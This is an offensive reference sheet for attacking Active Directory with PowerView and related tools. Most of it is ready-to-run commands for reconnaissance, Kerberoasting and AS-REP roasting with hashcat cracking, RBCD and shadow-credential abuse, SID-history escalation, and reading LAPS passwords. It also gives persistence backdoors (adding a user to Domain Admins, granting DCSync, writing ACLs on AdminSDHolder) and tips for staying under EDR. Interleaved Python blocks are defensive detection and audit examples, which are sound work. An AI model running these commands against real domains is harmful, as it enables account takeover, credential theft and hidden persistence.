Modern Get-Domain* names are preferred. Legacy Get-Net* aliases coexist in most builds.
| Legacy | Modern | Notes |
|---|---|---|
| Get-NetDomain | Get-Domain | Domain information via LDAP |
| Get-NetUser | Get-DomainUser | Modern has better filtering/properties |
| Get-NetGroup | Get-DomainGroup | Domain group enumeration |
| Get-NetComputer | Get-DomainComputer | Computer object enumeration |
| Get-NetGPO | Get-DomainGPO | Group Policy enumeration |
| Get-ObjectAcl | Get-DomainObjectAcl | ACL/ACE enumeration |
ENUMERATION
Domain Info
The SID is required for Golden/Silver Ticket attacks. Mandatory entry point.
Get-Domain
Get-Domain -Domain zirov.local
Get-DomainSID
Get-DomainController
Get-DomainController -Domain zirov.local
Domain Policy
Review before brute-forcing — check lockout threshold and Kerberos settings.
Get-DomainPolicy
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
Users
Low logoncount + old pwdlastset = possible honeypot. Check descriptions — they're often full of passwords.
Get-DomainUser
Get-DomainUser -Identity genarov69
Get-DomainUser -Properties samaccountname,pwdlastset,logoncount,badpwdcount
Get-DomainUser -LDAPFilter "(description=*pass*)"
Groups
Always recurse — nested membership is where real attack paths hide.
Get-DomainGroup
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain zirov.local -Recurse
Get-DomainGroup -UserName "genarov69"
Get-DomainManagedSecurityGroup | Select GroupName,ManagerName
Computers
Filter by OS or pull full attributes to identify high-value targets.
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2019*"
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp
Organizational Units
Look for OUs with linked GPOs — common privesc path via GPO abuse.
Get-DomainOU
Get-DomainOU -Properties name,gplink,distinguishedname
Get-DomainOU | Where-Object { $_.gplink -ne $null }
Map an OU to its linked GPO:
$ou = Get-DomainOU -Identity "Servers"
$gplink = $ou.gplink -replace '.*\{(.*?)\}.*','$1'
Get-DomainGPO -Identity "{$gplink}"
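The -replace above keeps only the first GUID, but a gPLink value can carry several links, each with an options bitmask that decides whether the link is enforced or disabled. The following is an added example (not PowerView's or this page's code) that parses the full attribute; the sample value is constructed and the function names are this example's own:

```python
import re

# Constructed gPLink value for this example (not taken from a real directory): two linked
# GPOs, the second one enforced. Real values come from the gplink property of Get-DomainOU.
SAMPLE_GPLINK = (
    "[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=zirov,DC=local;0]"
    "[LDAP://cn={6AC1786C-016F-11D2-945F-00C04fB984F9},cn=policies,cn=system,DC=zirov,DC=local;2]"
)

# Each link is "[LDAP://<GPO DN>;<options>]". options is a bitmask:
#   bit 0 (value 1) = link disabled, bit 1 (value 2) = link enforced.
LINK_RE = re.compile(r"\[LDAP://(?P<dn>[^;\]]+);(?P<options>\d+)\]", re.IGNORECASE)
GUID_RE = re.compile(r"cn=\{(?P<guid>[0-9A-F-]{36})\}", re.IGNORECASE)


def parse_gplink(gplink):
    """Split a gPLink string into one dict per linked GPO, in the order the attribute lists them."""
    links = []
    for match in LINK_RE.finditer(gplink or ""):
        dn = match.group("dn")
        options = int(match.group("options"))
        guid = GUID_RE.search(dn)
        links.append({
            "guid": guid.group("guid").upper() if guid else None,
            "dn": dn,
            "disabled": bool(options & 1),
            "enforced": bool(options & 2),
        })
    return links


def effective_gpo_guids(gplink):
    """GUIDs of the links that actually apply to the OU (disabled links are skipped)."""
    return [link["guid"] for link in parse_gplink(gplink) if not link["disabled"]]


if __name__ == "__main__":
    for link in parse_gplink(SAMPLE_GPLINK):
        state = "enforced" if link["enforced"] else ("disabled" if link["disabled"] else "linked")
        print(f"{link['guid']}  {state}")
```

Feed each GUID from effective_gpo_guids into Get-DomainGPO -Identity "{GUID}" to map every applying policy; a disabled link still sits in gPLink but has no effect, so auditing only on the presence of the attribute overstates what is applied.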
DNS
Useful for discovering internal services, shares, DFS, and non-standard hosts.
Get-DomainDNSZone
Get-DomainDNSZone -Domain zirov.local
Get-DomainDNSRecord -ZoneName zirov.local
Get-DomainDNSRecord -ZoneName zirov.local | Where-Object { $_.RecordType -eq "A" }
GPOs
Look for recently modified GPOs or GPOs that push users into local groups.
Get-DomainGPO
Get-DomainGPO | Select displayname,whenchanged
Get-DomainGPO -ComputerIdentity zirov-dc.zirov.local
Get-DomainGPOLocalGroup
Get-DomainGPOUserLocalGroupMapping -Identity "genarov69"
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity zirov-dc.zirov.local
Active Sessions
Get-NetLoggedon requires local admin. Get-LoggedonLocal uses remote registry (Server OS only). Both are noisy — avoid mass use on monitored networks.
Get-NetLoggedon -ComputerName zirov-dc.zirov.local
Get-LoggedonLocal -ComputerName zirov-dc.zirov.local
Get-LastLoggedon -ComputerName zirov-dc.zirov.local
Local Groups & Shares
Find-LocalAdminAccess is extremely noisy and triggers EDR. Prefer SharpHound LocalAdmin collection in monitored environments.
Find-LocalAdminAccess -Verbose
Get-NetLocalGroup -ComputerName zirov-dc.zirov.local -ListGroups
Invoke-ShareFinder -Verbose
Find-InterestingDomainShareFile -Verbose
Get-NetFileServer
ACL ABUSE
Enumerate ACLs
Always resolve GUIDs or the output is unreadable. SYSVOL is world-readable by default.
Get-DomainObjectAcl -Identity genarov69 -ResolveGUIDs
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
(Get-Acl "AD:\CN=Administrator,CN=Users,DC=zirov,DC=local").Access
Get-PathAcl -Path "\\zirov-dc.zirov.local\sysvol"
Broad ACE Scan
Full LDAP sweep — noisy in large environments. Filter out legitimate trustees to reduce noise.
Invoke-ACLScanner -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs | Select IdentityReferenceName,ObjectDN,ActiveDirectoryRights
Targeted ACE Hunting
Look for WriteDACL, GenericAll, GenericWrite on a specific object.
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl"
}
ForceChangePassword
Direct access to the account without knowing the current password.
Invoke-ACLScanner -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "User-Force-Change-Password"
}
WriteDACL
Allows granting yourself any right over the target object.
Invoke-ACLScanner -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "WriteDacl"
}
DCSync Rights
Find who has replication rights outside of legitimate holders.
Get-DomainObjectAcl -Identity "DC=zirov,DC=local" -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "DS-Replication-Get-Changes" -and
$_.IdentityReferenceName -notmatch "Domain Controllers|Enterprise Domain Controllers|Domain Admins|Enterprise Admins|SYSTEM"
}
KERBEROS ATTACKS
Kerberoasting
Users with SPNs — request a TGS and crack offline. Filter by high-value services first.
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainUser -SPN | Where-Object { $_.serviceprincipalname -match "MSSQLSvc|http|exchange" }
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Out-File spntix.txt
Crack: hashcat -m 13100 spntix.txt wordlist.txt (RC4, etype 23) or -m 19600 (AES128, etype 17).
ASREPRoasting
Pre-auth disabled — no credentials needed to get the hash.
Get-DomainUser -PreauthNotRequired | Select samaccountname
Get hashes: Rubeus.exe asreproast /format:hashcat /outfile:asrephashes.txt
Crack: hashcat -m 18200 asrephashes.txt wordlist.txt
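Both roasting techniques above leave a characteristic trace on the domain controller: a 4769 issued with RC4 for a user service account, and a 4768 with pre-authentication type 0. The following is an added example (not PowerView's or this page's code) showing the detection logic a defender would run over parsed Security-log events to catch both patterns. The events are constructed, and the window and threshold are assumed tuning values:

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"            # etype 23: the ciphertext the classic roasting modes crack
ROAST_WINDOW = timedelta(minutes=5)
ROAST_THRESHOLD = 5          # distinct service accounts per requester per window (assumed tuning value)

# Constructed events, shaped like the parsed fields of Security log 4768/4769 (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": "2024-05-01T09:00:01", "TargetUserName": "genarov69@ZIROV.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:02", "TargetUserName": "genarov69@ZIROV.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:02", "TargetUserName": "genarov69@ZIROV.LOCAL",
     "ServiceName": "svc_mq", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:03", "TargetUserName": "genarov69@ZIROV.LOCAL",
     "ServiceName": "svc_ftp", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T09:00:04", "TargetUserName": "genarov69@ZIROV.LOCAL",
     "ServiceName": "svc_rpt", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x0"},
    # Normal machine-to-DC ticket, AES: must not be counted.
    {"EventID": 4769, "Time": "2024-05-01T09:00:07", "TargetUserName": "ZIROV-WS01$@ZIROV.LOCAL",
     "ServiceName": "ZIROV-DC$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.21", "Status": "0x0"},
    # AS-REQ for an account with pre-auth disabled (PreAuthType 0), RC4.
    {"EventID": 4768, "Time": "2024-05-01T09:01:00", "TargetUserName": "svc_backup",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "10.10.10.50"},
    {"EventID": 4768, "Time": "2024-05-01T09:01:05", "TargetUserName": "alice",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "10.10.10.33"},
]


def is_roastable_tgs(ev):
    """4769 for a user (not computer, not krbtgt) service account, issued with RC4: crackable offline."""
    svc = ev.get("ServiceName", "")
    return (ev["EventID"] == 4769 and ev.get("Status") == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def find_kerberoast_bursts(events):
    """Requesters that obtained RC4 TGS for >= ROAST_THRESHOLD distinct services within ROAST_WINDOW."""
    by_requester = defaultdict(list)
    for ev in events:
        if is_roastable_tgs(ev):
            key = (ev["TargetUserName"], ev["IpAddress"])
            by_requester[key].append((datetime.fromisoformat(ev["Time"]), ev["ServiceName"]))
    alerts = []
    for (requester, ip), reqs in by_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):       # sliding window over the sorted requests
            services = {svc for t, svc in reqs[i:] if t - start <= ROAST_WINDOW}
            if len(services) >= ROAST_THRESHOLD:
                alerts.append({"requester": requester, "ip": ip, "services": sorted(services)})
                break
    return alerts


def find_asrep_roast(events):
    """4768 with PreAuthType 0 (no pre-authentication) and RC4: the AS-REP itself is crackable."""
    return [{"account": ev["TargetUserName"], "ip": ev["IpAddress"]}
            for ev in events
            if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0"
            and ev["TicketEncryptionType"] == RC4_HMAC]


if __name__ == "__main__":
    print(find_kerberoast_bursts(SAMPLE_EVENTS))
    print(find_asrep_roast(SAMPLE_EVENTS))
```

The RC4 filter is what keeps the rule quiet: AES tickets (0x11/0x12) are not worth cracking, so an environment that has set service accounts to AES-only and moved them to gMSA or long random passwords produces almost no hits, and any remaining RC4 TGS for a user account deserves a look. The PreAuthType 0 check is likewise a finding on its own, since the fix is simply to re-enable pre-authentication on that account.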
DELEGATION
Unconstrained Delegation
Compromising one of these allows capturing TGTs from any user that authenticates. Force DC authentication via Print Spooler or PetitPotam to capture a DC TGT.
Get-DomainComputer -Unconstrained | Select dnshostname,useraccountcontrol
Get-DomainUser -AllowDelegation -AdminCount | Select samaccountname
Constrained Delegation
Can impersonate any user toward the listed services via S4U2Proxy.
Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select samaccountname,msds-allowedtodelegateto
RBCD — Find Targets
GenericWrite or GenericAll over a computer object is enough to configure RBCD.
Get-DomainComputer | Where-Object {
$_."msds-allowedtoactonbehalfofotheridentity" -ne $null
} | Select dnshostname,msds-allowedtoactonbehalfofotheridentity
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "GenericWrite|GenericAll" -and
$_.ObjectDN -match "CN=.*,CN=Computers"
}
RBCD — Configure
Configure after confirming write access on the target object.
$sid = Get-DomainComputer -Identity attackerPC | Select-Object -ExpandProperty objectsid
Set-DomainObject -Identity targetPC -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sid}
Shadow Credentials
Requires WriteProperty on msDS-KeyCredentialLink. Add the key with Whisker, then use Rubeus with PKINIT to get a TGT without knowing the password.
Get-DomainObject -Identity targetuser -Properties msDS-KeyCredentialLink
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "msDS-KeyCredentialLink" -and
$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll"
}
Full flow: Whisker.exe add /target:targetuser → PFX cert → Rubeus.exe asktgt /certificate:cert.pfx
TRUSTS
Map Trusts
Direction and type determine the attack path. Always map before attempting cross-domain lateral movement.
Get-DomainTrust
Get-DomainTrust -Domain zirov.local
Get-DomainTrust -Recurse
Get-ForestTrust
Get-ForestTrust -Forest external.local
Get-NetForestDomain -Forest zirov.local | Get-NetDomainController
| Type | Direction | Implication |
|---|---|---|
| Parent-Child | Bidirectional transitive | DA in child → SID history to parent |
| Forest | Usually one-way | Check selective auth + SID filtering |
| External | One-way non-transitive | Limited lateral movement |
| Shortcut | Bidirectional | Speeds up auth between child domains |
SID Filtering & Selective Authentication
TrustAttributes=4 means filtering is disabled — SID history abuse is possible. TrustAttributes=8 indicates selective authentication — only specific users can authenticate.
Get-DomainTrust | Select SourceName,TargetName,TrustAttributes,TrustDirection
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose
SID History Abuse
If you have DA in a child domain and SID filtering is off: get the Enterprise Admins SID from the root domain, forge a Golden Ticket with that SID in the SIDHistory field, and access root domain resources.
Get-DomainGroup -Identity "Enterprise Admins" -Domain zirov.local | Select objectsid
SPECIALIZED TARGETS
LAPS
Identify who can read local administrator passwords — direct path to lateral movement.
Find-AdmPwdExtendedRights -Identity "Workstations"
Find-LAPSDelegatedGroups
Get-DomainComputer -Identity workstation01 -Properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Get-DomainComputer | Where-Object { $_."ms-mcs-admpwd" -ne $null }
gMSA
Find gMSA accounts and check who can retrieve the managed password.
Get-DomainObject -LDAPFilter "(objectClass=msDS-GroupManagedServiceAccount)"
Get-DomainObject -Identity "gmsaaccount$" -Properties msDS-GroupMSAMembership
ADCS — Certificate Services
PowerView alone doesn't fully enumerate ADCS. Use Certify (Windows) or Certipy (Linux) for complete ESC detection.
Get-DomainObject -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=zirov,DC=local" -LDAPFilter "(objectclass=pKIEnrollmentService)"
Windows — full scan of CAs and vulnerable templates:
.\Certify.exe cas
.\Certify.exe find /vulnerable
Linux:
certipy find -u genarov69@zirov.local -p 'P@ssw0rd' -dc-ip 10.10.10.1 -vulnerable
| ESC | Description |
|---|---|
| ESC1 | Requestor supplies SAN → enroll as any user |
| ESC4 | Write access to template → modify for ESC1 |
| ESC8 | NTLM relay to AD CS HTTP endpoint |
Exchange
Membership in Organization Management frequently leads to DCSync via the Exchange Windows Permissions group.
Get-DomainGroup | Where-Object { $_.name -match "Exchange" }
Get-DomainGroupMember -Identity "Organization Management" -Recurse
Get-DomainGroupMember -Identity "Exchange Windows Permissions"
Get-DomainComputer | Where-Object { $_.serviceprincipalname -match "exchangeMDB|MSExchangeMTA" }
SCCM / MECM
Site servers often have highly privileged service accounts. NAA credentials are sometimes stored in plaintext in WMI.
Get-DomainGroup | Where-Object { $_.name -match "SCCM|SMS|ConfigMgr" }
Get-DomainComputer | Where-Object { $_.dnshostname -match "sccm|sms|cm" }
AdminSDHolder
Objects with admincount=1 have their ACL reset every 60 min by SDProp. A backdoor here survives DA password changes.
Get-DomainUser -AdminCount | Select samaccountname,admincount
Get-DomainComputer -AdminCount | Select dnshostname,admincount
PERSISTENCE & BACKDOORS
Group Membership Abuse
Requires GenericAll or WriteProperty on the group object. Always verify the add succeeded.
Add-DomainGroupMember -Identity "Domain Admins" -Members "genarov69"
Get-DomainGroupMember -Identity "Domain Admins" | Select MemberName
User Object Manipulation
Password reset requires ForceChangePassword or GenericAll. SPN and preauth abuse require WriteProperty. Always clean up after cracking.
Set-DomainUserPassword -Identity genarov69 -AccountPassword (ConvertTo-SecureString "N3wP@ss!" -AsPlainText -Force)
Set-DomainObject -Identity genarov69 -Set @{serviceprincipalname="fake/zirov"}
Set-DomainObject -Identity genarov69 -Clear serviceprincipalname
Set-DomainObject -Identity genarov69 -XOR @{useraccountcontrol=4194304}
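The -XOR line flips bit 0x400000 (DONT_REQ_PREAUTH, decimal 4194304) in userAccountControl, and the -Unconstrained, -TrustedToAuth and -PreauthNotRequired filters earlier on the page are just bitwise tests on the same attribute. The following is an added example (not PowerView's or this page's code) that decodes a userAccountControl value, reports which flags a change set or cleared, and builds the LDAP bitwise-AND filter those PowerView switches translate to; the flag table is the documented LDAP one and the function names are this example's own:

```python
# LDAP userAccountControl bits relevant to the switches and the -XOR line on this page.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation (-Unconstrained)
    0x100000: "NOT_DELEGATED",                    # "account is sensitive and cannot be delegated"
    0x400000: "DONT_REQ_PREAUTH",                 # 4194304, the value XORed on the page (-PreauthNotRequired)
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition (-TrustedToAuth)
}
NAME_TO_BIT = {name: bit for bit, name in UAC_FLAGS.items()}
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Flags whose appearance (or, for NOT_DELEGATED, disappearance) weakens the account.
RISKY_WHEN_SET = {"DONT_REQ_PREAUTH", "TRUSTED_FOR_DELEGATION", "TRUSTED_TO_AUTH_FOR_DELEGATION", "PASSWD_NOTREQD"}
RISKY_WHEN_CLEARED = {"NOT_DELEGATED"}


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def uac_diff(old, new):
    """Flags that a change turned on and off, computed from the XOR of the two values."""
    changed = old ^ new
    return {"set": decode_uac(changed & new), "cleared": decode_uac(changed & old)}


def risky_changes(old, new):
    """Human-readable list of the security-relevant flips between two values."""
    diff = uac_diff(old, new)
    return ([f"set {f}" for f in diff["set"] if f in RISKY_WHEN_SET]
            + [f"cleared {f}" for f in diff["cleared"] if f in RISKY_WHEN_CLEARED])


def bit_and_filter(flag_name):
    """LDAP filter matching objects whose userAccountControl has the given flag set."""
    return f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={NAME_TO_BIT[flag_name]})"


if __name__ == "__main__":
    before = 0x10200                       # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    after = before ^ 4194304               # what the -XOR line on the page produces
    print(decode_uac(before), "->", decode_uac(after))
    print(risky_changes(before, after))
    print(bit_and_filter("DONT_REQ_PREAUTH"))
```

Running uac_diff over the old and new values of a changed account is the quickest way to confirm what a modification actually did, and bit_and_filter gives the exact LDAP query to sweep the domain for every account that currently carries a given flag.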
ACL Backdoors
DCSync without DA — grants DS-Replication-Get-Changes + DS-Replication-Get-Changes-All. AdminSDHolder survives SDProp resets.
Add-DomainObjectAcl -TargetIdentity "DC=zirov,DC=local" -PrincipalIdentity genarov69 -Rights DCSync
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity genarov69 -Rights All
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity genarov69 -Rights WriteMembers
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=zirov,DC=local" -PrincipalIdentity genarov69 -Rights All
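Each of the four backdoors above is visible in the ACL it modifies, so the defensive counterpart is a periodic diff of the domain head and AdminSDHolder against an allowlist of trustees that legitimately hold those rights. The following is an added example (not PowerView's or this page's code) of that check; the ACE rows are constructed and modeled on the fields Get-DomainObjectAcl -ResolveGUIDs and Find-InterestingDomainAcl emit, and the allowlist is an assumed baseline:

```python
import re
from collections import defaultdict

DOMAIN_DN = "DC=zirov,DC=local"
ADMINSDHOLDER_DN = "CN=AdminSDHolder,CN=System," + DOMAIN_DN

# Trustees expected to hold replication or write rights here; anything else is a finding.
# Assumed baseline for this example; adjust to what your directory legitimately contains.
EXPECTED_TRUSTEES = {
    "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
    "ZIROV\\Domain Admins", "ZIROV\\Enterprise Admins",
    "ZIROV\\Domain Controllers", "ZIROV\\Enterprise Domain Controllers",
    "ZIROV\\Enterprise Read-only Domain Controllers",
}
DCSYNC_RIGHTS = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
WRITE_RIGHTS = re.compile(r"GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty")

# Constructed ACE rows (not real data), shaped like resolved PowerView ACL output.
SAMPLE_ACES = [
    {"ObjectDN": DOMAIN_DN, "IdentityReferenceName": "ZIROV\\Domain Controllers", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "DS-Replication-Get-Changes-All"},
    {"ObjectDN": DOMAIN_DN, "IdentityReferenceName": "ZIROV\\genarov69", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "DS-Replication-Get-Changes"},
    {"ObjectDN": DOMAIN_DN, "IdentityReferenceName": "ZIROV\\genarov69", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "DS-Replication-Get-Changes-All"},
    # Only one half of the pair: cannot DCSync on its own.
    {"ObjectDN": DOMAIN_DN, "IdentityReferenceName": "ZIROV\\svc_backup", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": "DS-Replication-Get-Changes"},
    {"ObjectDN": ADMINSDHOLDER_DN, "IdentityReferenceName": "NT AUTHORITY\\SYSTEM", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "GenericAll", "ObjectAceType": "All"},
    {"ObjectDN": ADMINSDHOLDER_DN, "IdentityReferenceName": "NT AUTHORITY\\Authenticated Users",
     "AceType": "AccessAllowed", "ActiveDirectoryRights": "ReadProperty, GenericExecute", "ObjectAceType": "All"},
    {"ObjectDN": ADMINSDHOLDER_DN, "IdentityReferenceName": "ZIROV\\helpdesk", "AceType": "AccessAllowed",
     "ActiveDirectoryRights": "GenericAll", "ObjectAceType": "All"},
]


def _rights(ace):
    return {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}


def find_dcsync_holders(aces, expected=EXPECTED_TRUSTEES):
    """Trustees that can DCSync the domain head: both replication rights, or a right that implies them."""
    granted = defaultdict(set)
    for ace in aces:
        if ace["ObjectDN"] != DOMAIN_DN or ace["AceType"] != "AccessAllowed":
            continue
        rights = _rights(ace)
        trustee = ace["IdentityReferenceName"]
        if "GenericAll" in rights or ("ExtendedRight" in rights and ace.get("ObjectAceType") in (None, "All")):
            granted[trustee] |= DCSYNC_RIGHTS        # unrestricted: covers every extended right
        elif ace.get("ObjectAceType") in DCSYNC_RIGHTS:
            granted[trustee].add(ace["ObjectAceType"])
    return sorted(t for t, r in granted.items() if DCSYNC_RIGHTS <= r and t not in expected)


def find_adminsdholder_writers(aces, expected=EXPECTED_TRUSTEES):
    """Unexpected trustees with write-class rights on AdminSDHolder (SDProp copies them to every protected object)."""
    return sorted({ace["IdentityReferenceName"] for ace in aces
                   if ace["ObjectDN"] == ADMINSDHOLDER_DN and ace["AceType"] == "AccessAllowed"
                   and WRITE_RIGHTS.search(ace["ActiveDirectoryRights"])
                   and ace["IdentityReferenceName"] not in expected})


if __name__ == "__main__":
    print("DCSync outside baseline:", find_dcsync_holders(SAMPLE_ACES))
    print("AdminSDHolder writers outside baseline:", find_adminsdholder_writers(SAMPLE_ACES))
```

Export the two ACLs on a schedule, run the checks, and alert on any new name; because SDProp re-applies AdminSDHolder every 60 minutes, a stray ACE there reappears on every protected group and account until it is removed at the source.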
Alternate Credentials
All PowerView functions accept -Credential. Useful when you have creds but aren't running as that user.
$pass = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("zirov\genarov69", $pass)
Get-Domain -Credential $cred
Get-DomainUser -Credential $cred
Invoke-UserHunter -Credential $cred
Full process impersonation:
runas /netonly /user:zirov\genarov69 powershell.exe
BLOODHOUND, SESSION HUNTING & RECIPES
Session Hunting
Invoke-UserHunter sweeps all hosts via NetSessionEnum and NetWkstaUserEnum — very noisy. Use -Stealth first (DCs + file servers only), then -CheckAccess to confirm local admin before moving laterally.
Invoke-UserHunter -Stealth -GroupName "Domain Admins"
Invoke-UserHunter -GroupName "Domain Admins" -CheckAccess
Invoke-UserHunter -UserName "genarov69"
SharpHound
Preferred collector for modern environments. DCOnly is quiet (LDAP only). All is comprehensive but very noisy.
.\SharpHound.exe -c DCOnly
.\SharpHound.exe -c All
.\SharpHound.exe -c All --domain zirov.local --ldapusername genarov69 --ldappassword "P@ssw0rd!"
.\SharpHound.exe -c All --loop --loopduration 00:30:00 --loopinterval 00:05:00
Invoke-BloodHound
PowerShell alternative when SharpHound isn't viable.
Invoke-BloodHound -CollectionMethod DCOnly
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -Domain zirov.local -LDAPUser genarov69 -LDAPPass "P@ssw0rd!"
| Method | Noise | When to Use |
|---|---|---|
| DCOnly | Low | Initial recon, AV environments |
| Session | High | Only for DA session hunting |
| All | High | When noise is acceptable |
| Loop | Very High | Capture transient DA sessions |
Priority edges in BloodHound: GenericAll, GenericWrite, WriteDacl, Owns, ForceChangePassword, AllowedToDelegate, HasSIDHistory.
Recipe — Find Dangerous ACLs
Exclude built-in trustees to reduce noise and focus on real paths.
Invoke-ACLScanner -ResolveGUIDs | Where-Object {
$_.IdentityReferenceName -notmatch "SYSTEM|Domain Admins|Enterprise Admins|Administrators"
} | Select IdentityReferenceName,ObjectDN,ActiveDirectoryRights | Sort ObjectDN
Recipe — Find RBCD Targets
Computers you hold write rights over; that is enough to configure RBCD and impersonate DA.
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ActiveDirectoryRights -match "GenericWrite|GenericAll" -and
$_.ObjectAceType -eq "All" -and
$_.ObjectDN -match "CN=.*,CN=Computers"
}
Recipe — Find Shadow Credential Targets
Objects where you hold write rights on msDS-KeyCredentialLink.
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {
$_.ObjectAceType -match "msDS-KeyCredentialLink" -and
$_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll"
}
Flow: Whisker.exe add /target:targetuser → PFX → Rubeus.exe asktgt /certificate:cert.pfx
Recipe — Find Cross-Forest Escalation
Map all forest trusts and look for foreign users/groups in the local domain.
Get-ForestTrust
Find-ForeignGroup -Verbose
Find-ForeignUser -Verbose
Get-DomainTrust | Where-Object { $_.TrustType -eq "Forest" } | Select SourceName,TargetName,TrustDirection,TrustAttributes
Recipe — Full DA Path Discovery
Run in order — from least to most noisy.
Get-DomainTrust; Get-ForestTrust
Invoke-ACLScanner -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match "GenericAll|WriteDacl|GenericWrite" }
Get-DomainComputer -Unconstrained | Select dnshostname
Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select samaccountname,msds-allowedtodelegateto
Invoke-UserHunter -Stealth -CheckAccess
OPSEC Reference
| Command | Noise | Notes |
|---|---|---|
| Get-DomainUser | Low | LDAP only |
| Get-DomainComputer | Low | LDAP only |
| Get-DomainObjectAcl | Low | LDAP only |
| Get-DomainSPNTicket | Low | KDC request only |
| SharpHound -c DCOnly | Low | LDAP only, no host contact |
| Invoke-ACLScanner | Medium | Large LDAP sweep |
| Get-NetLoggedon | Medium | Local admin + RPC per host |
| Invoke-UserHunter -Stealth | Medium | DCs + file servers only |
| Invoke-ShareFinder | High | SMB sweep across domain |
| Invoke-UserHunter | High | Touches all hosts |
| Find-LocalAdminAccess | Very High | SMB/RPC to all hosts |
| SharpHound -c All | Very High | Session + host enumeration |
| SharpHound --Loop | Very High | Continuous noise |
